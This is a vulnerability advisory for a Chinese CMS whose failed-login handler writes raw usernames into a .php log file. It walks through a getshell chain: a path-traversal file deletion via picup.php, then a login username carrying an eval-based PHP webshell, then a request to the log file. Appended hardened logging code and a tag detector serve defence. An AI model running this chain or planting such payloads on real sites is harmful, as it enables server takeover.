Taizhou Jisu Network (台州市极速网络) CMS /data/log/passlog.php arbitrary code execution vulnerability

2015-09-28T00:00:00
ID SSV:89565
Type seebug
Reporter
Modified 2015-09-28T00:00:00

Description

First look at login.php in the root directory:

```php
<?
$IS_LOGIN = true;
require "./includes/headinc.php";
register_shutdown_function('union_end');

if($action == 'logout') {
    $union_user = $union_pass = $gid = '';
    //clearcookies();
    //$sess_arr = array();
    $SESSION[sess_arr] = $sess_arr = '';
    session_unregister('sess_arr');
    echo "<meta http-equiv=\"refresh\" content=\"0;url=admin.php\">";
    //header("Location:login.php");
    exit;
}

if($action == 'login') {
    $validate_t = crypt($validate, 'ckskya576');
    if($_SESSION[md5vali] != $validate_t)
        //showmessage("Captcha check failed, please go back");

    $UNION_USER = '';
    $loginpass2 = md5($loginpass);
    $UNION_USER = $db->fetchSingle("SELECT uid AS union_uid, fig AS union_fig, username AS union_user, password AS union_pass FROM table_members WHERE username='$loginuser' && password='$loginpass2'");
    if($UNION_USER[union_uid] && !$UNION_USER[union_fig])
        showmessage('此帐号不可用');
    if ($UNION_USER) {
        //$qs_ts = $db->query_fetch("select * from table_sessions where username='$UNION_USER[union_user]' && ip!='$yip'");
        //if($qs_ts[username])
        //    showmessage('Sorry, the same account cannot be logged in on several computers at once');
        //echo "delete from table_sessions where ip='$yip' && sesskey!='".session_id()."'";exit;
        //$db->query("delete from table_sessions where ip='$yip' && sesskey!='".session_id()."'");
        #$db->queryDb("update table_members set loginnum=loginnum+1,lastlogin='".time()."' where uid=$UNION_USER[union_uid]",1);
        //union_setcookie("union_user", $UNION_USER['union_user']);
        //union_setcookie("union_pass_", $UNION_USER['union_pass']);
    }else{
        $errorlog = "$loginuser\t".substr($loginpass, 0, 2);
        for($i = 3; $i < strlen($loginpass); $i++) {
            $errorlog .= "";
        }
        $errorlog .= substr($loginpass, -1)."\t$yip\t$timestamp\n";

        @$fp = fopen("./data/log/passlog.php", "a");
        @flock($fp, 3);
        @fwrite($fp, $errorlog);
        @fclose($fp);

        //clearcookies();
    }
```

The part that matters is this:

```php
$errorlog = "$loginuser\t".substr($loginpass, 0, 2);
for($i = 3; $i < strlen($loginpass); $i++) {
    $errorlog .= "";
}
$errorlog .= substr($loginpass, -1)."\t$yip\t$timestamp\n";

@$fp = fopen("./data/log/passlog.php", "a");
@flock($fp, 3);
@fwrite($fp, $errorlog);
@fclose($fp);
```

On a failed login, the wrong username and the masked password are written straight into data/log/passlog.php...

Think about it: isn't that an arbitrary code write??

It is plainly inviting you to write malicious code into the file. Can you drop a one-line webshell straight in? Of course you can.

For example, enter `<?php phpinfo();?>` in the username field and anything at all as the password, then request data/log/passlog.php to see whether it executed.

However, there are usually many existing failed-login records, so the file contains errors and will not execute right away. But remember my previous post?

Arbitrary file deletion.

The getshell steps are as follows (do not do anything bad; the consequences are on you):

1. First visit, for example: http://XXX.COM/picup.php?action=del&pic=../data/log/passlog.php

2. Then visit http://XXX.COM/login.php

   Username: `<?php phpinfo();eval($_POST[XXX]);?>`

   Password: 3333333

3. Visit http://XXX.COM/data/log/passlog.php; that is the shell, and the password is XXX.
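The root cause above is a log record built from unescaped user input and appended to a file with a `.php` extension inside the web root, so anything the web server is asked for is interpreted as code. The following is an added example, not the CMS's own code: a hardened replacement for the failed-login logger (same inputs the original has on hand: `$loginuser`, `$loginpass`, `$yip`, `$timestamp`) together with a checker that scans an existing passlog file for PHP open tags so an administrator can tell whether it has already been seeded. The function names, the log path and the sample records are assumptions. Two facts it relies on: with `JSON_HEX_TAG`, `json_encode` emits `<` and `>` as `\u003C` and `\u003E`, so an open tag can never appear literally in the log; and PHP's `flock` constant `3` is `LOCK_UN` (unlock), so the original `@flock($fp, 3)` never took a lock at all.

```php
<?php
// Added example (not the CMS's code): hardened failed-login logger plus a
// checker for existing log files. Paths and sample values are assumptions.

/**
 * Mask a password the way the original code intends (first two chars,
 * stars, last char) without ever storing the full value.
 */
function mask_password(string $pass): string {
    $len = strlen($pass);
    if ($len <= 3) {
        return str_repeat('*', $len);
    }
    return substr($pass, 0, 2) . str_repeat('*', $len - 3) . substr($pass, -1);
}

/**
 * Encode one field so it cannot carry tabs, newlines or PHP open tags into
 * the log. JSON_HEX_TAG turns "<" and ">" into \u003C and \u003E.
 */
function log_field(string $value): string {
    return json_encode($value, JSON_HEX_TAG | JSON_UNESCAPED_UNICODE);
}

/**
 * Append one failed-login record. $logfile must live outside the web root
 * and must not end in .php; the function refuses anything the web server
 * could execute. Returns true on success.
 */
function log_failed_login(string $user, string $pass, string $ip, int $ts, string $logfile): bool {
    if (strtolower(substr($logfile, -4)) === '.php') {
        return false;
    }
    $line = implode("\t", [
        log_field($user),
        log_field(mask_password($pass)),
        log_field($ip),
        (string) $ts,
    ]) . "\n";

    $fp = fopen($logfile, 'a');
    if ($fp === false) {
        return false;
    }
    // The original calls flock($fp, 3); 3 is LOCK_UN, so no lock was ever
    // taken. LOCK_EX is the exclusive write lock that was meant.
    $ok = flock($fp, LOCK_EX) && fwrite($fp, $line) !== false;
    flock($fp, LOCK_UN);
    fclose($fp);
    return $ok;
}

/**
 * Detection helper for an existing passlog.php: returns the 1-based line
 * numbers that contain a PHP open tag, i.e. records that would run as code
 * if the file were requested over HTTP.
 */
function find_php_tags(string $logfile): array {
    $hits = [];
    $lines = file($logfile, FILE_IGNORE_NEW_LINES);
    if ($lines === false) {
        return $hits;
    }
    foreach ($lines as $i => $line) {
        if (preg_match('/<\?/', $line)) {
            $hits[] = $i + 1;
        }
    }
    return $hits;
}

// Usage with constructed sample data (not taken from any real system).
// 1. A legacy log written by the vulnerable code, with one injected record:
$legacy = tempnam(sys_get_temp_dir(), 'passlog');
file_put_contents($legacy,
    "admin\tpa****d\t198.51.100.9\t1443398400\n" .
    "<?php phpinfo();?>\t33*****3\t198.51.100.9\t1443398401\n");
print_r(find_php_tags($legacy));   // reports line 2

// 2. The same attempt through the hardened logger; the tag is encoded,
//    the file is not .php and sits where the web server does not serve.
$safe = sys_get_temp_dir() . '/passlog.log';   // stands in for a path outside the web root
var_dump(log_failed_login('<?php phpinfo();?>', '3333333', '198.51.100.9', 1443398401, $safe));
print_r(find_php_tags($safe));     // empty: no literal "<?" in the file
```

Beyond encoding, the durable fixes are structural: keep the log out of the document root (or deny HTTP access to data/log/ at the web server), give it a non-executable extension, and never derive a file name from the request; the picup.php deletion step in the advisory only matters because the log file is also reachable as a script.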